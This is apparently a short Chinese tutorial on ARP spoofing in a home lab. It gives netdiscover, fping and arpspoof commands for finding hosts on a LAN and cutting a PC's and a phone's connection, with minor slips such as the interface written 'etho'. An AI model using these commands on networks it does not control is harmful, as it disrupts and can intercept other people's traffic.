arp中断网络

‍

探测主机存活

　　netdiscover查找局域网内所有主机，【比较慢，防火墙开启的情况下，一样探测】

netdiscover -i eth0（自己网卡的名称，有的外接网卡为wlan0） -r 192.168.1.40（自己虚拟机的IP）/24

　　​​​​

　　fping -asg 网段例如192.168.52.0/24 【ctrl+c退出，防火墙开启下，不能探测出】

　　以上命令都是扫描局域网内存活的主机IP

fping -asg 192.168.1.0/24

　　​​​

　　‍

arpspoof

　　arpspoof 是一个用于进行 ARP 欺骗的工具，它可以让攻击者截获目标主机和网关之间的网络流量。arpspoof -i eth0 是指定使用 eth0 网卡进行 ARP 欺骗，但是还需要提供目标主机和网关的 IP 地址。例如，如果目标主机的 IP 地址是 192.168.1.100，网关的 IP 地址是 192.168.1.1，那么可以使用以下命令：

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

前提

• 靶机和攻击机在同一个网段上，使用kali完成这次操作演示，在虚拟机下进行，kali虚拟机使用桥接网络的方式，以至于与主机网络在同一网段

• 攻击机：192.168.1.100

• 手机靶机：192.168.1.7

• 电脑靶机：192.168.1.11

• 网关：192.168.1.1

• root用户权限

Linux让安装arpspoof

　　注意：使用arpspoof工具必须要有root权限！！！

　　切换root用户

sudo su
apt-get install -y dsniff ssldump

中断执行

　　中断指令：

arpspoof -i etho -t 192.168.1.9 192.168.1.1

• etho 是你的网卡，根据你的网卡填写
• 192.168.1.9 是你要中断的网络
• 192.168.1.1 是当前网络的网关

中断电脑

　　靶机电脑：192.168.1.11

　　​​

　　中断成功，已经无法ping

　　​​

　　按ctrl + z退出中断

中断手机

　　​​

　　​​

　　中断成功？，emmm，使用b战时有明显的卡顿。

　　‍